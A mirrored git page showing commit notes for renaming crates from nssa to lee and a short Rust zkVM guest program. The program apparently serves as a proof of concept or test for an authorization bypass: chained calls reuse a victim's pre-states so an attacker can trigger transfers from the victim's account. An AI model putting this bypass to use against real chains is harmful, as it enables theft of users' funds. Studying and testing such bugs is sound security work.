mirror of
https://github.com/logos-blockchain/lssa.git
synced 2026-06-28 03:49:52 +00:00
4bcffafe27
BREAKING CHANGE:
- Crate `nssa` renamed to `lee`; update `Cargo.toml` dependencies from `nssa = { workspace = true }` to `lee = { workspace = true }`.
- Crate `nssa_core` renamed to `lee_core`; update similarly.
- Crate `key_protocol` moved under `lee`; update `Cargo.toml` dependencies from `key_protocol = { workspace = true }` to `lee_key_protocol = { workspace = true }`.
- Type `NSSATransaction` (in `common`) renamed to `LeeTransaction`.
- Error type `nssa::error::NssaError` renamed to `lee::error::LeeError`.
- Error type `nssa_core::error::NssaCoreError` renamed to `lee_core::error::LeeCoreError`.
- All `use nssa::` and `use nssa_core::` import paths must be updated to `use lee::` and `use lee_core::` respectively.
- Guest programs must replace `write_nssa_outputs` with `write_lee_outputs`.
- The sequencer RocksDB column family for the chain state was renamed. Existing databases are incompatible and must be wiped before running the new version.
- Domain separators updated: `"NSSA_seed"` → `"LEE_seed"` (key derivation), `"NSSA/v0.2/KDF-SHA256/"` → `"LEE/v0.2/KDF-SHA256/"` (encryption KDF), `"/NSSA/v0.2/AccountId/PDA/"` →
`"/LEE/v0.2/AccountId/PDA/"` (public PDA address derivation). All previously derived keys, encrypted outputs, and public PDA addresses are invalidated.
44 lines
1.5 KiB
Rust
44 lines
1.5 KiB
Rust
use lee_core::program::{ChainedCall, ProgramId, ProgramInput, ProgramOutput, read_lee_inputs};
|
|
|
|
/// Instruction: (`auth_transfer_id`, `amount`) — both primitive, safe for `risc0_zkvm::serde`.
|
|
type Instruction = (ProgramId, u128);
|
|
|
|
fn main() {
|
|
let (
|
|
ProgramInput {
|
|
self_program_id,
|
|
caller_program_id,
|
|
pre_states,
|
|
instruction: (auth_transfer_id, amount),
|
|
},
|
|
instruction_words,
|
|
) = read_lee_inputs::<Instruction>();
|
|
|
|
// Output empty pre/post states. P2 processes no accounts itself, so the
|
|
// authorization check at validated_state_diff.rs:158-182 runs over nothing.
|
|
// Victim is never compared against caller_data.authorized_accounts = {attacker}.
|
|
//
|
|
// The bug: authorized_accounts for authenticated_transfer is built from
|
|
// chained_call.pre_states (this call's inputs, set by P1), which contains
|
|
// victim(is_authorized=true). So authorized_accounts = {victim}, and the
|
|
// subsequent check passes.
|
|
let auth_transfer_instruction =
|
|
risc0_zkvm::serde::to_vec(&authenticated_transfer_core::Instruction::Transfer { amount })
|
|
.expect("serialization is infallible");
|
|
|
|
ProgramOutput::new(
|
|
self_program_id,
|
|
caller_program_id,
|
|
instruction_words,
|
|
vec![],
|
|
vec![],
|
|
)
|
|
.with_chained_calls(vec![ChainedCall {
|
|
program_id: auth_transfer_id,
|
|
pre_states,
|
|
instruction_data: auth_transfer_instruction,
|
|
pda_seeds: vec![],
|
|
}])
|
|
.write();
|
|
}
|